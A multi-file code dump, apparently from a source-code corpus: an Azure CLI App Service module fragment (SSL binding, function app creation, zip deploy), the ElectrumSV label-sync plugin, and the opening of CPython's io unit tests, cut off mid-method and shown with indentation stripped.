query_result = list_hostnames(resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(resource_group_name, name, webapp.location,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(
resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client):
self._client = client
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(k, v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
raw_list = self._client.provider.get_available_stacks()
stacks = raw_list['value']
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
result = []
# get all stack version except 'java'
for name, properties in [(s['name'], s['properties']) for s in stacks
if s['name'] in config_mappings]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def create_function(resource_group_name, name, storage_account, plan=None,
consumption_plan_location=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
deployment_container_image_name=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config)
client = web_client_factory()
if consumption_plan_location:
locations = list_consumption_locations()
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
else:
if is_valid_resource_id(plan):
plan = parse_resource_id(plan)['name']
plan_info = client.app_service_plans.get(resource_group_name, plan)
location = plan_info.location
is_linux = plan_info.reserved
if is_linux:
functionapp_def.kind = 'functionapp,linux'
site_config.app_settings.append(NameValuePair('FUNCTIONS_EXTENSION_VERSION', 'beta'))
site_config.app_settings.append(NameValuePair('MACHINEKEY_DecryptionKey',
str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
site_config.app_settings.append(NameValuePair('DOCKER_CUSTOM_IMAGE_NAME',
deployment_container_image_name))
site_config.app_settings.append(NameValuePair('FUNCTION_APP_EDIT_MODE', 'readOnly'))
site_config.app_settings.append(NameValuePair('WEBSITES_ENABLE_APP_SERVICE_STORAGE', 'false'))
else:
site_config.app_settings.append(NameValuePair('WEBSITES_ENABLE_APP_SERVICE_STORAGE', 'true'))
site_config.linux_fx_version = 'DOCKER|appsvc/azure-functions-runtime'
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair('FUNCTIONS_EXTENSION_VERSION', '~1'))
functionapp_def.server_farm_id = plan
functionapp_def.location = location
con_string = _validate_and_get_connection_string(resource_group_name, storage_account)
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair('AzureWebJobsStorage', con_string))
site_config.app_settings.append(NameValuePair('AzureWebJobsDashboard', con_string))
site_config.app_settings.append(NameValuePair('WEBSITE_NODE_DEFAULT_VERSION', '6.5.0'))
if consumption_plan_location is None:
site_config.always_on = True
else:
site_config.app_settings.append(NameValuePair('WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
con_string))
site_config.app_settings.append(NameValuePair('WEBSITE_CONTENTSHARE', name.lower()))
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation()(poller)
_set_remote_or_local_git(functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
return functionapp
def _set_remote_or_local_git(webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(resource_group_name, storage_account):
from azure.cli.core._profile import CLOUD
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name.value
allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(e, storage_account) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(resource_group_name, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = CLOUD.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations():
client = web_client_factory()
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(" ", "")} for x in regions]
def enable_zip_deploy(resource_group_name, name, src, slot=None):
client = web_client_factory()
user_name, password = _get_site_credential(client, resource_group_name, name)
scm_url = _get_scm_url(resource_group_name, name, slot)
zip_url = scm_url + '/api/zipdeploy'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
import requests
import os
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
r = requests.post(zip_url, data=zip_content, headers=headers)
if r.status_code != 200:
raise CLIError("Zip deployment {} failed with status code '{}' and reason '{}'".format(
zip_url, r.status_code, r.text))
# on successful deployment navigate to the app, display the latest deployment json response
response = requests.get(scm_url + '/api/deployments/latest', headers=authorization)
return response.json()
|
label_sync.py | # ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
from functools import partial
import json
import hashlib
import os
import requests
import threading
from typing import Any, Optional
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QFileDialog, QMessageBox, QPushButton, QVBoxLayout
from electrumsv.app_state import app_state
from electrumsv.crypto import aes_decrypt_with_iv, aes_encrypt_with_iv
from electrumsv.exceptions import UserCancelled
from electrumsv.extensions import label_sync
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, Wallet
from .util import (Buttons, EnterButton, FormSectionWidget, FramedTextWidget, OkButton,
WindowModalDialog)
logger = logs.get_logger("labels")
# Label sync only currently works for addresses and transactions. It needs several pieces of
# work before it can be re-enabled:
# - Labels are now only tracked for keys and transactions that exist. This means that if someone
# does a sync, unlike before where there was a dictionary that was not required to map to
# existing entries, any entries that are for unknown entries will be lost without special
# handling.
# - Addresses cannot be mapped to keys, unless we enumerate all existing keys. Any labels for
# addresses we cannot find through enumeration, will similarly be lost without special handling.
# If we modify this to take labels from keys, the code should perhaps instead map the label
# to the masterkey fingerprint combined with the derivation path. However, this still leaves
# room for the presence of unsynced keys.
# - There is no per-account storage for "wallet_nonce" to be get/set from/to.
# TODO: Need to fix `set_transaction_label` before this can work again as well, work grows.
DISABLE_INTEGRATION = True
class LabelSync(object):
def __init__(self):
self.target_host = 'labels.electrum.org'
self._accounts = {}
app_state.app.window_opened_signal.connect(self.window_opened)
app_state.app.window_closed_signal.connect(self.window_closed)
def encode(self, account: AbstractAccount, msg):
password, iv, account_id = self._accounts[account]
encrypted = aes_encrypt_with_iv(password, iv, msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, account: AbstractAccount, message):
password, iv, wallet_id = self._accounts[account]
decoded = base64.b64decode(message)
decrypted = aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, account : AbstractAccount) -> int:
# nonce is the nonce to be used with the next change
if DISABLE_INTEGRATION:
return 1
# TODO BACKLOG there is no working account get/set
nonce = account.get('wallet_nonce', None)
if nonce is None:
nonce = 1
self.set_nonce(account, nonce)
return nonce
def set_nonce(self, account: AbstractAccount, nonce: int) -> None:
logger.debug("set {} nonce to {}".format(account.name(), nonce))
# TODO BACKLOG there is no working account get/set
account.put("wallet_nonce", nonce)
def set_transaction_label(self, wallet: Wallet, tx_hash: bytes, text: Optional[str]) -> None:
if DISABLE_INTEGRATION:
return
raise NotImplementedError("Transaction labels not supported")
# label_key = tx_hash
# assert label_key != tx_hash, "Label sync transaction support not implemented"
# # label_key = "tx:"+ hash_to_hex_str(tx_hash)
# self._set_label(account, label_key, text)
def set_keyinstance_label(self, account: AbstractAccount, key_id: int, text: str) -> None:
if DISABLE_INTEGRATION:
return
# TODO(rt12) BACKLOG if this is going to be made to work, it needs to fetch the
# fingerprint and derivation data, or something equivalent.
label_key = key_id # "key:"+ key_id
assert label_key != key_id, "Label sync key instance support not implemented"
self._set_label(account, label_key, text)
def _set_label(self, account: AbstractAccount, item, label) -> None:
if account not in self._accounts:
return
if not item:
return
nonce = self.get_nonce(account)
wallet_id = self._accounts[account][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(account, item),
"encryptedLabel": self.encode(account, label)}
t = threading.Thread(target=self.do_request_safe,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(account, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
response = response.json()
if "error" in response:
raise Exception(response["error"])
return response
def do_request_safe(self, *args, **kwargs):
try:
self.do_request(*args, **kwargs)
except Exception:
logger.exception('requesting labels')
def push_thread(self, account) -> None:
assert not DISABLE_INTEGRATION
account_data = self._accounts.get(account, None)
if not account_data:
raise Exception('Account {} not loaded'.format(account))
wallet_id = account_data[2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(account)}
# TODO(rt12) BACKLOG there is no account.labels any more. IT needs to iterate over
# transaction and keyinstance labels.
for key, value in account.labels.items():
try:
encoded_key = self.encode(account, key)
encoded_value = self.encode(account, value)
except Exception:
logger.error('cannot encode %r %r', key, value)
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, account: AbstractAccount, force: bool) -> Optional[Any]:
account_data = self._accounts.get(account, None)
if not account_data:
raise Exception('Account {} not loaded'.format(account))
wallet_id = account_data[2]
nonce = 1 if force else self.get_nonce(account) - 1
logger.debug(f"asking for labels since nonce {nonce}")
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
logger.debug('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(account, label["externalId"])
value = self.decode(account, label["encryptedLabel"])
except Exception:
continue
try:
json.dumps(key)
json.dumps(value)
except Exception:
logger.error(f'no json {key}')
continue
result[key] = value
logger.info(f"received {len(result):,d} labels")
updates = {}
for key, value in result.items():
# TODO(rt12) BACKLOG there is no account.labels any more.
if force or not account.labels.get(key):
updates[key] = value
if DISABLE_INTEGRATION:
return updates
if len(updates):
# TODO(rt12) BACKLOG there is no account.put or account storage at this time, or
# even `account.labels`.
account.labels.update(updates)
# do not write to disk because we're in a daemon thread. The handed off writing to
# the sqlite writer thread would achieve this.
account.put('labels', account.labels)
self.set_nonce(account, response["nonce"] + 1)
self.on_pulled(account, updates)
def pull_thread_safe(self, account: AbstractAccount, force: bool) -> None:
try:
self.pull_thread(account, force)
except Exception as e:
logger.exception('could not retrieve labels')
def start_account(self, account: AbstractAccount) -> None:
nonce = self.get_nonce(account)
logger.debug("Account %s nonce is %s", account.name(), nonce)
mpk = ''.join(sorted(account.get_master_public_keys()))
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self._accounts[account] = (password, iv, wallet_id)
if DISABLE_INTEGRATION:
return
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread_safe, args=(account, False))
t.setDaemon(True)
t.start()
def stop_account(self, account: AbstractAccount) -> None:
self._accounts.pop(account, None)
def on_enabled_changed(self) -> None:
if label_sync.is_enabled():
for window in app_state.app.windows:
self.window_opened(window)
else:
for window in app_state.app.windows:
self.window_closed(window)
def window_opened(self, window):
if label_sync.is_enabled():
app_state.app.labels_changed_signal.connect(window.update_tabs)
for account in window._wallet.get_accounts():
self.start_account(account)
def window_closed(self, window):
for account in window._wallet.get_accounts():
self.stop_account(account)
def settings_widget(self, *args):
return EnterButton(_('Export'), partial(self.settings_dialog, *args))
def threaded_button(self, text, dialog, func, *args):
def on_clicked(_checked):
self.run_in_thread(dialog, button, func, *args)
button = QPushButton(text)
button.clicked.connect(on_clicked)
return button
def settings_dialog(self, prefs_window, account: AbstractAccount):
d = WindowModalDialog(prefs_window, _("Label Settings"))
form = FormSectionWidget()
form.add_title(_("Label sync options"))
if not DISABLE_INTEGRATION:
upload = self.threaded_button("Force upload", d, self.push_thread, account)
form.add_row(_("Upload labels"), upload)
download = self.threaded_button("Force download", d, self.pull_thread, account, True)
form.add_row(_("Export labels"), download)
label = FramedTextWidget(_("The label sync services are no longer supported. However, "
"ElectrumSV will still allow users to download and export their existing labels. These "
"exported label files can then be imported, and any entries they have which can be "
"matched to wallet contents may be added to the appropriate record."))
vbox = QVBoxLayout(d)
vbox.addWidget(label)
vbox.addWidget(form)
vbox.addSpacing(20)
vbox.addLayout(Buttons(OkButton(d)))
return bool(d.exec_())
def on_pulled(self, account: AbstractAccount, updates: Any) -> None:
app_state.app.labels_changed_signal.emit(account._wallet.get_storage_path(),
account.get_id(), updates)
def on_exception(self, dialog, exception):
if not isinstance(exception, UserCancelled):
logger.exception("")
d = QMessageBox(QMessageBox.Warning, dialog, _('Error'), str(exception))
d.setWindowModality(Qt.WindowModal)
d.exec_()
def run_in_thread(self, dialog, button, func, *args) -> Any:
def on_done(future):
button.setEnabled(True)
try:
data = future.result()
except Exception as exc:
self.on_exception(dialog, exc)
else:
if DISABLE_INTEGRATION:
if data is None:
dialog.show_message(_("No labels were present."))
else:
filename = 'electrumsv_labelsync_labels.json'
directory = os.path.expanduser('~')
path = os.path.join(directory, filename)
filename, __ = QFileDialog.getSaveFileName(dialog,
_('Enter a filename for the copy of your labels'), path, "*.json")
if not filename:
return
json_text = json.dumps(data)
with open(filename, "w") as f:
f.write(json_text)
else:
dialog.show_message(_("Your labels have been synchronised."))
button.setEnabled(False)
app_state.app.run_in_thread(func, *args, on_done=on_done)
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.script_helper import assert_python_ok
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
self.assertRaises(TypeError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
